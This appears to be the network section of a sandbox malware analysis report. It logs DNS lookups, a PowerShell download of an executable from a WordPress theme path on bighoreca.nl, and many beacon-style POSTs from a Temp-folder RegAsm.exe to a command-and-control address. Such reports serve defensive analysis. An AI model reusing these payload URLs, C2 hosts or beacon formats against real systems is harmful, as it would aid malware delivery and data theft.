Jan 5, 2021 19:05:21.351258039 CET | 53 | 53099 | 8.8.8.8 | 192.168.2.22
Jan 5, 2021 19:05:21.357091904 CET | 52838 | 53 | 192.168.2.22 | 8.8.8.8
Jan 5, 2021 19:05:21.415157080 CET | 53 | 52838 | 8.8.8.8 | 192.168.2.22
Jan 5, 2021 19:05:22.378812075 CET | 61200 | 53 | 192.168.2.22 | 8.8.8.8
Jan 5, 2021 19:05:22.447736979 CET | 53 | 61200 | 8.8.8.8 | 192.168.2.22

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jan 5, 2021 19:05:20.671252966 CET | 192.168.2.22 | 8.8.8.8 | 0xad13 | Standard query (0) | cutt.ly | A (IP address) | IN (0x0001)
Jan 5, 2021 19:05:22.378812075 CET | 192.168.2.22 | 8.8.8.8 | 0x1175 | Standard query (0) | bighoreca.nl | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jan 5, 2021 19:05:20.727847099 CET | 8.8.8.8 | 192.168.2.22 | 0xad13 | No error (0) | cutt.ly | | 104.22.0.232 | A (IP address) | IN (0x0001)
Jan 5, 2021 19:05:20.727847099 CET | 8.8.8.8 | 192.168.2.22 | 0xad13 | No error (0) | cutt.ly | | 172.67.8.238 | A (IP address) | IN (0x0001)
Jan 5, 2021 19:05:20.727847099 CET | 8.8.8.8 | 192.168.2.22 | 0xad13 | No error (0) | cutt.ly | | 104.22.1.232 | A (IP address) | IN (0x0001)
Jan 5, 2021 19:05:22.447736979 CET | 8.8.8.8 | 192.168.2.22 | 0x1175 | No error (0) | bighoreca.nl | | 83.172.144.37 | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

• bighoreca.nl
• 185.206.215.56

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.22 | 49167 | 83.172.144.37 | 80 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | kBytes transferred | Direction | Data
Jan 5, 2021 19:05:22.500040054 CET | 70 | OUT | GET /wp-content/themes/index/QPR-3067.exe HTTP/1.1
    Host: bighoreca.nl
    Connection: Keep-Alive
Jan 5, 2021 19:05:22.551645994 CET | 71 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 05 Jan 2021 18:05:22 GMT
    Content-Type: application/octet-stream
    Content-Length: 938440
    Last-Modified: Tue, 05 Jan 2021 14:03:47 GMT
    Connection: keep-alive
    ETag: "5ff471c3-e51c8"
    X-Powered-By: PleskLin
    Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.22 | 49168 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data
Jan 5, 2021 19:06:07.649980068 CET | 1143 | OUT | POST /morx/1/cgi.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: 185.206.215.56
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: 598F9AF4
    Content-Length: 176
    Connection: close
Jan 5, 2021 19:06:07.837934971 CET | 1143 | IN | HTTP/1.0 404 Not Found
    Date: Tue, 05 Jan 2021 18:06:06 GMT
    Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
    X-Powered-By: PHP/5.6.40
    Status: 404 Not Found
    Content-Length: 15
    Connection: close
    Content-Type: text/html; charset=UTF-8
    Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
    Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
10 | 192.168.2.22 | 49177 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data
Jan 5, 2021 19:06:11.296993017 CET | 1155 | OUT | POST /morx/1/cgi.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: 185.206.215.56
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: 598F9AF4
    Content-Length: 149
    Connection: close
Jan 5, 2021 19:06:11.461579084 CET | 1155 | IN | HTTP/1.0 404 Not Found
    Date: Tue, 05 Jan 2021 18:06:10 GMT
    Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
    X-Powered-By: PHP/5.6.40
    Status: 404 Not Found
    Content-Length: 23
    Connection: close
    Content-Type: text/html; charset=UTF-8
    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
    Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
100 | 192.168.2.22 | 49267 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
101 | 192.168.2.22 | 49268 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
102 | 192.168.2.22 | 49269 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
103 | 192.168.2.22 | 49270 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
104 | 192.168.2.22 | 49271 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
105 | 192.168.2.22 | 49272 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
106 | 192.168.2.22 | 49273 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
107 | 192.168.2.22 | 49274 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
108 | 192.168.2.22 | 49275 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
109 | 192.168.2.22 | 49276 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
11 | 192.168.2.22 | 49178 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data
Jan 5, 2021 19:06:11.686949968 CET | 1156 | OUT | POST /morx/1/cgi.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: 185.206.215.56
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: 598F9AF4
    Content-Length: 149
    Connection: close
Jan 5, 2021 19:06:11.871412992 CET | 1157 | IN | HTTP/1.0 404 Not Found
    Date: Tue, 05 Jan 2021 18:06:10 GMT
    Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
    X-Powered-By: PHP/5.6.40
    Status: 404 Not Found
    Content-Length: 23
    Connection: close
    Content-Type: text/html; charset=UTF-8
    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
    Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
110 | 192.168.2.22 | 49277 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
111 | 192.168.2.22 | 49278 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
112 | 192.168.2.22 | 49279 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
113 | 192.168.2.22 | 49280 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
114 | 192.168.2.22 | 49281 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
115 | 192.168.2.22 | 49282 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
116 | 192.168.2.22 | 49283 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
117 | 192.168.2.22 | 49284 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
118 | 192.168.2.22 | 49285 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
119 | 192.168.2.22 | 49286 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
12 | 192.168.2.22 | 49179 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data
Jan 5, 2021 19:06:12.075634003 CET | 1157 | OUT | POST /morx/1/cgi.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: 185.206.215.56
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: 598F9AF4
    Content-Length: 149
    Connection: close
Jan 5, 2021 19:06:12.243051052 CET | 1158 | IN | HTTP/1.0 404 Not Found
    Date: Tue, 05 Jan 2021 18:06:11 GMT
    Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
    X-Powered-By: PHP/5.6.40
    Status: 404 Not Found
    Content-Length: 23
    Connection: close
    Content-Type: text/html; charset=UTF-8
    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
    Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
120 | 192.168.2.22 | 49287 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
121 | 192.168.2.22 | 49288 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
122 | 192.168.2.22 | 49289 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
123 | 192.168.2.22 | 49290 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
124 | 192.168.2.22 | 49291 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
125 | 192.168.2.22 | 49292 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
126 | 192.168.2.22 | 49293 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
127 | 192.168.2.22 | 49294 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
128 | 192.168.2.22 | 49295 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
129 | 192.168.2.22 | 49296 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
13 | 192.168.2.22 | 49180 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data
Jan 5, 2021 19:06:12.449877024 CET | 1159 | OUT | POST /morx/1/cgi.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: 185.206.215.56
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: 598F9AF4
    Content-Length: 149
    Connection: close
Jan 5, 2021 19:06:12.609106064 CET | 1159 | IN | HTTP/1.0 404 Not Found
    Date: Tue, 05 Jan 2021 18:06:11 GMT
    Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
    X-Powered-By: PHP/5.6.40
    Status: 404 Not Found
    Content-Length: 23
    Connection: close
    Content-Type: text/html; charset=UTF-8
    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
    Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
130 | 192.168.2.22 | 49297 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
131 | 192.168.2.22 | 49298 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
132 | 192.168.2.22 | 49299 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
133 | 192.168.2.22 | 49300 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
134 | 192.168.2.22 | 49301 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
135 | 192.168.2.22 | 49302 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
136 | 192.168.2.22 | 49303 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
137 | 192.168.2.22 | 49304 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
138 | 192.168.2.22 | 49305 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
139 | 192.168.2.22 | 49306 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
14 | 192.168.2.22 | 49181 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data
Jan 5, 2021 19:06:12.832798958 CET | 1160 | OUT | POST /morx/1/cgi.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: 185.206.215.56
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: 598F9AF4
    Content-Length: 149
    Connection: close
Jan 5, 2021 19:06:12.987730980 CET | 1161 | IN | HTTP/1.0 404 Not Found
    Date: Tue, 05 Jan 2021 18:06:12 GMT
    Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
    X-Powered-By: PHP/5.6.40
    Status: 404 Not Found
    Content-Length: 23
    Connection: close
    Content-Type: text/html; charset=UTF-8
    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
    Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
140 | 192.168.2.22 | 49307 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
141 | 192.168.2.22 | 49308 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
142 | 192.168.2.22 | 49309 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
143 | 192.168.2.22 | 49310 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
144 | 192.168.2.22 | 49311 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
145 | 192.168.2.22 | 49312 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
146 | 192.168.2.22 | 49313 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
147 | 192.168.2.22 | 49314 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
148 | 192.168.2.22 | 49315 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
149 | 192.168.2.22 | 49316 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
15 | 192.168.2.22 | 49182 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data
Jan 5, 2021 19:06:13.213063955 CET | 1161 | OUT | POST /morx/1/cgi.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: 185.206.215.56
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: 598F9AF4
    Content-Length: 149
    Connection: close
Jan 5, 2021 19:06:13.388159037 CET | 1162 | IN | HTTP/1.0 404 Not Found
    Date: Tue, 05 Jan 2021 18:06:12 GMT
    Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
    X-Powered-By: PHP/5.6.40
    Status: 404 Not Found
    Content-Length: 23
    Connection: close
    Content-Type: text/html; charset=UTF-8
    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
    Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
150 | 192.168.2.22 | 49317 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
151 | 192.168.2.22 | 49318 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
152 | 192.168.2.22 | 49319 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
153 | 192.168.2.22 | 49320 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
154 | 192.168.2.22 | 49321 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
155 | 192.168.2.22 | 49322 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
156 | 192.168.2.22 | 49323 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
157 | 192.168.2.22 | 49324 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
158 | 192.168.2.22 | 49325 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
159 | 192.168.2.22 | 49326 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
16 | 192.168.2.22 | 49183 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data
Jan 5, 2021 19:06:13.606386900 CET | 1163 | OUT | POST /morx/1/cgi.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: 185.206.215.56
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: 598F9AF4
    Content-Length: 149
    Connection: close
Jan 5, 2021 19:06:13.778989077 CET | 1163 | IN | HTTP/1.0 404 Not Found
    Date: Tue, 05 Jan 2021 18:06:12 GMT
    Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
    X-Powered-By: PHP/5.6.40
    Status: 404 Not Found
    Content-Length: 23
    Connection: close
    Content-Type: text/html; charset=UTF-8
    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
    Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
160 | 192.168.2.22 | 49327 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
161 | 192.168.2.22 | 49328 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
162 | 192.168.2.22 | 49329 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
163 | 192.168.2.22 | 49330 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
164 | 192.168.2.22 | 49331 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
165 | 192.168.2.22 | 49332 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
166 | 192.168.2.22 | 49333 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
167 | 192.168.2.22 | 49334 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
168 | 192.168.2.22 | 49335 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
169 | 192.168.2.22 | 49336 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
17 | 192.168.2.22 | 49184 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data
Jan 5, 2021 19:06:14.002546072 CET | 1164 | OUT | POST /morx/1/cgi.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: 185.206.215.56
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: 598F9AF4
    Content-Length: 149
    Connection: close
Jan 5, 2021 19:06:14.168911934 CET | 1164 | IN | HTTP/1.0 404 Not Found
    Date: Tue, 05 Jan 2021 18:06:13 GMT
    Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
    X-Powered-By: PHP/5.6.40
    Status: 404 Not Found
    Content-Length: 23
    Connection: close
    Content-Type: text/html; charset=UTF-8
    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
    Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
170 | 192.168.2.22 | 49337 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
171 | 192.168.2.22 | 49338 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        172192.168.2.2249339185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        173192.168.2.2249340185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        174192.168.2.2249341185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        175192.168.2.2249342185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        176192.168.2.2249343185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        177192.168.2.2249344185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        178192.168.2.2249345185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        179192.168.2.2249346185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
